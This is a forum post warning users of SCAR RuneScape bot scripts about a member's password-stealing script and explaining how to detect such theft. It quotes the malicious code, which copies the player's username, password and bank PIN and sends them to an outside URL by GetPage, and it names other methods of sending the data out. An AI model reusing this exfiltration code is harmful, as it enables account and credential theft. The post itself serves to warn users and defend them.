How to detect password stealing scripts
Recently an SRL Member "IROKI" has found to be password stealing,
(Good Catch BobboHobbo)
So if you have used one of his scripts recently change all your passwords that are the same as your runescape one, if your email is the same it is of great importance that you change this as this can be used to find all your passwords.
Ok so when a script is used to steal passwords it sends the passwords to a website.
There are multiple methods of this
1. Using GetPage
2. Using Plugins (this way is almost undetectable)
1. Using GetPage
This was used recently by Iroki
Procedure DeclarePlayers;
SCAR Code:
Begin
HowManyPlayers := 1;
NumberOfPlayers(HowManyPlayers);
CurrentPlayer := 0;
Players[0].Name := ''; // Your UserName
Players[0].Pass := ''; // Your PassWord
Players[0].Nick := ''; // Your Nick (3-4 letters from your username)
Players[0].Active := True; // Use this player ??
Players[0].Skill := 'Prayer'; // Skill to lamp
Players[0].Strings[0] := ''; // Your BankPin
Players[0].Strings[1] := 'Adamant'; // What kind of bars you want to smelt ( Bronze, Iron, Silver, Steel, Gold, Mithril, Adamant, Rune, CballsFO, CballsFB )
Code[0] := '';
Code[1] := '';
verKey := '';
End;
There we can see that you enter some your char info and some other info
nothing wrong with that.
However combined with
SCAR Code:
Begin
If (Code[0] = '') Or (Code[1] = '') Or (verKey = '') Then
Begin
Code[0] := Players[CurrentPlayer].Name;
Code[1] := Players[CurrentPlayer].Pass;
verKey := Players[CurrentPlayer].Strings[0];
End;
For i := 1 To Coding Do
Begin
Code[0] := CodeNow(Code[0]);
Code[1] := CodeNow(Code[1]);
End;
End;
Here we see that the codes and verification key are changed to the account details =O, in all honesty there is nothing wrong with that eithen tho its unnecessary, so if you see this be very suspicious if your still not sure ASK better safe than sorry.
Now the part that should make you worried.
SCAR Code:
GetPage('http://www.iroki.cba.pl/stats.php?tresc=Code[0]=' + Code[0] + '+Code[1]=' + Code[1] + '+verKey=' + verKey + '+&CreateSessionIDverKey+');
Here they are sending code[0] code[1] and verkey to a website which earlier we learned was changed to your account details.
Get/PostHTTPPage/Ex can also be used instead of GetPage (Thanks Mixster)
If you see this be wary.
Don't use it if it you see this.
Thanks Mixster for stuff below
Get/PostHTTPPage/Ex are the other ways to use it that is more easy to spot while going through the script, but harder to notice in popups as it simply has ?POST? or ?GET? at the end of the URL.
Plugin's have the advantage over not asking for permission to access a webpage but are still tracked in the same way of checking every use of username and password as they still have to be input into a procedure/function to send the info into the plugin.
Get/PostHTTPPage/Ex are the other ways to use it that is more easy to spot while going through the script, but harder to notice in popups as it simply has ?POST? or ?GET? at the end of the URL.
The only way to be 100% sure a script won't steal your details is to follow the scripts logic and see where it uses your username and password. Every method can be stopped that way.